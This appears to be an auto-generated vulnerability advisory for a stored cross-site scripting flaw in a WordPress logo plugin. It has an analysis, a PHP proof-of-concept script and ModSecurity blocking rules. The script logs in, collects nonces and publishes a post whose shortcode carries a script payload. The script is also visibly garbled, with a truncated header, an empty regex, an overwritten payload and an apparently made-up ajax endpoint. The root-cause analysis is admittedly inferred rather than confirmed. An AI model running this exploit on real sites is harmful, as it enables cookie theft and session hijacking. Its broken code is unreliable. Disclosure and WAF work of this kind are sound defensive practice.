Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: May 19, 2026

CVE-2026-6549: Logo Manager For Enamad <= 0.7.4 – Authenticated (Contributor+) Stored Cross-Site Scripting via 'title' Shortcode Attribute (logo-manager-for-enamad)

CVE ID: CVE-2026-6549
Severity: Medium (CVSS 6.4)
CWE: CWE-79
Vulnerable Version: 0.7.4
Patched Version: none at time of disclosure
Disclosed: May 18, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6549 (metadata-based):

This vulnerability is a stored cross-site scripting (XSS) flaw in the Logo Manager For Enamad plugin for WordPress, affecting versions up to and including 0.7.4. It allows authenticated users with the Contributor role or above to inject arbitrary web scripts via the 'title' attribute of three shortcodes: `vc_enamad_namad`, `vc_enamad_shamed` and `vc_enamad_custom`. The CVSS score is 6.4 (Medium), with a vector of AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N, indicating network exploitability, low attack complexity, required authentication and no user interaction needed for script execution.

The root cause is insufficient input sanitization and output escaping of user-supplied shortcode attributes. The plugin likely registers shortcodes that accept a 'title' attribute without filtering or encoding the value before rendering it on the page. Based on the CWE-79 classification and the description, the plugin probably reads the 'title' value directly from the shortcode parameters and echoes it into the HTML output without `esc_attr()` or a similar WordPress escaping function. This conclusion is inferred from the metadata; no code diff was available for confirmation.

Exploitation requires an attacker to have at least Contributor-level access in WordPress. The attacker creates or edits a post, page, or any content that supports shortcodes, and inserts one of the vulnerable shortcodes (e.g., `[vc_enamad_namad title="alert(document.cookie)"]`). The 'title' attribute value is stored in the database when the post is saved. When any user, including site administrators or visitors, views the page containing the malicious shortcode, the injected script executes in their browser. No additional user interaction is required beyond viewing the page.

A proper fix must sanitize the 'title' attribute using `sanitize_text_field()` or a similar function when processing shortcode attributes, and escape the output with `esc_attr()` before rendering. The WordPress shortcode API typically passes attributes through `shortcode_atts()`, which does not automatically sanitize or escape them. The plugin should implement these measures in the shortcode handler functions for all three vulnerable shortcodes. Since no patched version exists, users should disable the plugin until a fix is released.

If exploited, this vulnerability allows authenticated attackers to execute arbitrary JavaScript in the context of any user viewing the compromised page. This could lead to session hijacking, credential theft, defacement, or redirection to malicious sites. The impact is amplified by the stored nature of the XSS, as the payload persists until the malicious content is removed. The CVSS Confidentiality and Integrity impacts are both rated Low, but in practice an attacker could leverage the script to perform administrative actions if a logged-in administrator views the page.

Proof of Concept (PHP)

```php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6549 - Logo Manager For Enamad $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cve_cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cve_cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$response = curl_exec($ch);
curl_close($ch);

// Check if login succeeded by attempting to access admin dashboard
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cve_cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code != 200) {
    die("Login failed. Check credentials or target URL. HTTP code: $http_code\n");
}

// Step 2: Get a nonce for creating a new post via WP REST API
// We use REST API to avoid needing admin-ajax nonce extraction (simpler PoC)
$rest_nonce_url = $target_url . '/wp-json/wp/v2/users/me';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $rest_nonce_url);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cve_cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-WP-Nonce: 1')); // Dummy to get nonce
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$response = curl_exec($ch);
curl_close($ch);

// For simplicity, we directly use WP Admin new post form with nonce
// Fetch the post-new.php page to extract the _wpnonce
$new_post_url = $target_url . '/wp-admin/post-new.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $new_post_url);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cve_cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$response = curl_exec($ch);
curl_close($ch);

// Extract _wpnonce for creating posts
preg_match('//', $response, $matches);
if (empty($matches[1])) {
    // Try alternate regex patterns
    preg_match('/name="_wpnonce" value="([a-f0-9]+)"/', $response, $matches);
}
$nonce = isset($matches[1]) ? $matches[1] : '';

if (empty($nonce)) {
    die("Failed to extract post creation nonce. Manual intervention required.\n");
}

// Step 3: Create a new post containing the malicious shortcode
// The 'title' attribute will contain the XSS payload
// We use [vc_enamad_namad] as example; any of the three shortcodes works
$xss_payload = '"' . " onclick='alert(document.cookie)'" . ' style=position:fixed;top:0;left:0;width:100%;height:100%;z-index:9999'; // Using event handler for reliable execution without breaking HTML
// More direct: just use a script tag
$xss_payload = "alert(1)";

$post_data = array(
    'post_title' => 'CVE Test Post',
    'post_content' => '[vc_enamad_namad title="' . $xss_payload . '" other_attr="ignored"]',
    'post_status' => 'publish',
    'post_type' => 'post',
    '_wpnonce' => $nonce,
    'action' => 'post-quickpress-publish', // Not used, but we include standard fields
);

// Use admin-ajax to publish via quickpress (older WP) or direct REST
// Prefer REST API for reliability
$rest_create_url = $target_url . '/wp-json/wp/v2/posts';

// Get REST nonce from cookies or header
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php?action=rest-nonce');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cve_cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$rest_nonce_response = curl_exec($ch);
$rest_nonce = trim($rest_nonce_response);
curl_close($ch);

if (empty($rest_nonce)) {
    die("Failed to get REST nonce.\n");
}

$json_data = json_encode(array(
    'title' => 'CVE Test Post via REST',
    'content' => '[vc_enamad_namad title="' . $xss_payload . '"]',
    'status' => 'publish'
));

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $rest_create_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $json_data);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cve_cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/json',
    'X-WP-Nonce: ' . $rest_nonce
));
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

$response_data = json_decode($response, true);
if ($http_code == 201 && isset($response_data['id'])) {
    $post_id = $response_data['id'];
    echo "PoC successful. Created post ID $post_id with XSS payload.\n";
    echo "Visit: " . $target_url . '/?p=' . $post_id . " to trigger XSS.\n";
} else {
    echo "Failed to create post via REST. HTTP code: $http_code\n";
    if (isset($response_data['message'])) {
        echo "Error message: " . $response_data['message'] . "\n";
    }
    echo "Response: " . print_r($response_data, true) . "\n";
}

// Clean up cookie file
unlink('/tmp/cve_cookies.txt');
```

ModSecurity Rule

```
# Atomic Edge WAF Rule - CVE-2026-6549 (metadata-based)
# Blocks stored XSS via vulnerable shortcodes in Logo Manager For Enamad
# Matches on WP REST API requests that inject script content in 'content' or 'title' fields
# This rule targets the exploitation vector: authenticated (Contributor+) POST to /wp-json/wp/v2/posts or pages
# Since the vulnerable shortcode is processed server-side, we block XSS patterns in POST body content
SecRule REQUEST_URI "@beginsWith /wp-json/wp/v2/" \
    "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-6549 - Logo Manager For Enamad Stored XSS',severity:'CRITICAL',tag:'CVE-2026-6549'"
    SecRule REQUEST_METHOD "@streq POST" "chain"
    SecRule ARGS_POST:content "@rx (?i)<script[^>]*>[^<]*</script>|<[^>]+on\w+\s*=\s*['\"].*['\"].*>" "chain"
    SecRule ARGS_POST:content "@rx \[vc_enamad_(?:namad|shamed|custom)" "t:none"

# Alternative rule targeting admin-ajax.php with directly crafted shortcode submission
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" \
    "id:20261995,phase:2,deny,status:403,chain,msg:'CVE-2026-6549 - Logo Manager For Enamad Stored XSS (AJAX)',severity:'CRITICAL',tag:'CVE-2026-6549'"
    SecRule ARGS_POST:action "@rx ^(?:post-quickpress-publish|inline-save|wp_ajax_.*)$" "chain"
    SecRule ARGS_POST:post_content "@rx \[vc_enamad_(?:namad|shamed|custom)[^\]]*title\s*=\s*['\"][^'\"\]]*<script" "t:none"
```
